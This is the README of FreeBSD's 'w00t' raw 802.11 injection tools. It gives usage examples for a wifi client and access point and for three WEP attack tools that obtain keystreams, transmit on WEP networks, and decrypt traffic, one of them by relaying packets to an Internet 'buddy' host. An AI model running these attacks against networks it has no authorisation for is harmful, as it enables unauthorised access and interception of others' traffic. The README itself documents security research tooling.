xref: /freebsd/tools/tools/net80211/w00t/README (revision 4b9d6057) 
1
2This is a collection of tools that use raw 802.11 packet injection.
3None of the tools configure the interface, so be sure to run something
4like:
5
6ifconfig wlan create wlandev ath0 wlanmode ahdemo channel 7 promisc up
7
8beforehand.  The following tools are found here:
9
10assoc	A wifi client.
11ap	A wifi access point.
12
13prga	Gives ability to transmit on a WEP network.
14redir	Gives ability to decrypt in real-time on a WEP network, via Internet.
15expand	Gives ability to decrypt locally on a WEP network.
16
17All these tools depend on:
18
19libw00t	Utility functions used by all tools.
20
21Detailed explanation of tools.
22==============================
23
24assoc:
25
26Acts as a wifi client.  It will associate to a network and bind a
27tap interface to it.  The interface may be used like a standard eth
28interface attached to a normal LAN.  Multiple instances of the
29program may be run in order to connect to multiple APs simultaneously.
30Example:
31
32./assoc -s w00t -t tap0
33ifconfig tap0 192.168.0.123 up
34ping 192.168.0.1
35
36ap:
37
38The same as assoc, but acts as an access point.  Example:
39
40./ap -s w00t -t tap1
41ifconfig tap1 192.168.0.1 up
42tcpdump -n -i tap1
43
44[For the next set of tools, refer to http://tapir.cs.ucl.ac.uk/bittau-wep.pdf
45for theoretical information.]
46
47prga:
48
49Sniff a packet on a WEP network and obtain a keystream.  It binds
50to a tap interface which may be used to TX packets on that network.
51Example:
52
53./prga -b bssid_of_network -t tap0
54ifconfig tap0 192.168.0.123 up
55ping 192.168.0.1
56
57redir:
58
59Resend WEP packets to our buddy on the Internet.  The buddy will
60receive the clear-text and send it back to us via a UDP socket.
61This data is then fed back into a tap interface.  This way, data
62may be ultimately be read from the tab iface in clear-text.  Example:
63
64[Box on Internet]~# ./buddy
65./redir -d buddy_ip -b bssid -t tap0 -r wifi_rtr_mac -s wifi_src_ip -p 666
66ifconfig tap0 up
67tcpdump -n -i tap0
68
69expand:
70
71Sniff a WEP packet and do the linear keystream expansion trick to
72decrypt it.  The clear-text packet is sent to a tap interface.
73Example:
74
75./expand -b bssid -t tap0
76ifconfig tap0 up
77tcpdump -n -i tap0
78